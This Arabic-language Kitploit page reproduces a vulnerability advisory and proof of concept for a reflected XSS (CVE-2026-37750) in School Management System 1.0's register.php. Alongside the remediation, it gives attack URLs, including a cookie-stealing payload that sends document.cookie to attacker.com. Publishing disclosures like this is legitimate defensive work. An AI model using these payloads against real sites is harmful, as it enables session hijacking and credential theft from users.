Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-37750 — # إثبات مفهوم لـ XSS المنعكسة في نظام إدارة المدرسة 1.0 إثبات مفهوم لثغرة XSS المنعكسة في نظام إدارة المدرسة 1.0، يوضح تنفيذ JavaScript غير المصادق عليه عبر معامل type في register.php، مع تحليل الأثر وإرشادات المعالجة. | Kitploit
أدوات/GitHubGitHub/menevarad007/cve-2026-37750
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويبالتعلم والتعليم
GitHubmenevarad007/cve-2026-37750

CVE-2026-37750

# إثبات مفهوم لـ XSS المنعكسة في نظام إدارة المدرسة 1.0 إثبات مفهوم لثغرة XSS المنعكسة في نظام إدارة المدرسة 1.0، يوضح تنفيذ JavaScript غير المصادق عليه عبر معامل type في register.php، مع تحليل الأثر وإرشادات المعالجة.

عرض المستودع
45منذ 5 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-37750 — نظام إدارة المدارس 1.0 - XSS منعكسة

التفاصيل

الحقلالمعلومات
معرف CVECVE-2026-37750
النوعCross-Site Scripting منعكسة (XSS)
الخطورةمتوسطة (CVSSv3: 6.1)
البائعmahmoudai1
المنتجنظام إدارة المدارس
الإصدار1.0
مكتشف الثغرةVarad AP Mene
التاريخ2026-04-16
CWECWE-79

الوصف

ثغرة Cross-Site Scripting (XSS) منعكسة في نظام إدارة المدارس 1.0 من mahmoudai1 تسمح للمهاجمين عن بُعد دون مصادقة بتنفيذ JavaScript عشوائي في متصفحات الضحايا عبر معامل type غير المعقّم في register.php. يتم عكس المعامل دون تهريب داخل وسم h1 في السطر 22 وداخل سمة action للنموذج في السطر 26. لا تتطلب استغلال هذه الثغرة أي مصادقة.

معرف CVE: CVE-2026-37750 CWE: CWE-79 CVSSv3: 6.1 متوسطة (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)


وصف المنتج

نظام إدارة المدارس 1.0 هو تطبيق ويب PHP/MySQL من mahmoudai1 على GitHub يُستخدم لإدارة الطلاب والمعلمين وأولياء الأمور في المدارس.

رابط البائع: https://github.com/mahmoudai1/school-management-system


الملف المعرّض للثغرة

register.php — نموذج التسجيل (لا يتطلب مصادقة)


الكود المعرّض للثغرة

السطر 22: echo ucfirst($_REQUEST['type'])

السطر 26: echo $_REQUEST['type']

لا يتم استخدام htmlspecialchars() — يتم عكس إدخال المستخدم الخام مباشرة في HTML.


إثبات المفهوم

المتطلبات الأساسية:

  • لا تتطلب مصادقة
  • يجب أن يعمل الهدف بنظام إدارة المدارس 1.0

الخطوة 1 — افتح المتصفح وقم بزيارة هذا الرابط: http://target/register.php?type=script-alert-document.cookie-/script

الخطوة 2 — يتم تنفيذ JavaScript في المتصفح النتيجة: تظهر نافذة تنبيه تعرض ملفات تعريف الارتباط الخاصة بالجلسة.

الخطوة 3 — حمولة سرقة ملفات تعريف الارتباط: http://target/register.php?type=script-document.location-http://attacker.com/steal?c=-document.cookie-/script الخطوة 4 — حمولة حقن سمة action للنموذج: http://target/register.php?type="-script-alert(1)-/script

تم تأكيد نقطتي حقن:

نقطة الحقن 1 — داخل وسم h1 (السطر 22):

root@kitploit:~
echo ucfirst($_REQUEST['type'])

المخرجات:

root@kitploit:~
<h1><script>alert(1)</script> Application</h1>

نقطة الحقن 2 — داخل سمة action للنموذج (السطر 26):

root@kitploit:~
echo $_REQUEST['type']

المخرجات:

root@kitploit:~
<form action="register.php?type=<script>alert(1)</script>">

التأثير

  • اختطاف الجلسة عبر سرقة ملفات تعريف الارتباط
  • التصيد الاحتيالي — حقن نماذج تسجيل دخول مزيفة
  • توزيع البرمجيات الخبيثة عبر عمليات إعادة التوجيه
  • لا تتطلب مصادقة

المعالجة

إصلاح السطر 22: echo htmlspecialchars(ucfirst($_REQUEST['type']), ENT_QUOTES, 'UTF-8');

إصلاح السطر 26: echo htmlspecialchars($_REQUEST['type'], ENT_QUOTES, 'UTF-8');


المراجع

  • https://github.com/mahmoudai1/school-management-system
  • https://github.com/mahmoudai1/school-management-system/blob/main/register.php

مكتشف الثغرة

Varad AP Mene البريد الإلكتروني: [email protected] GitHub: https://github.com/menevarad007

تنزيل الأداة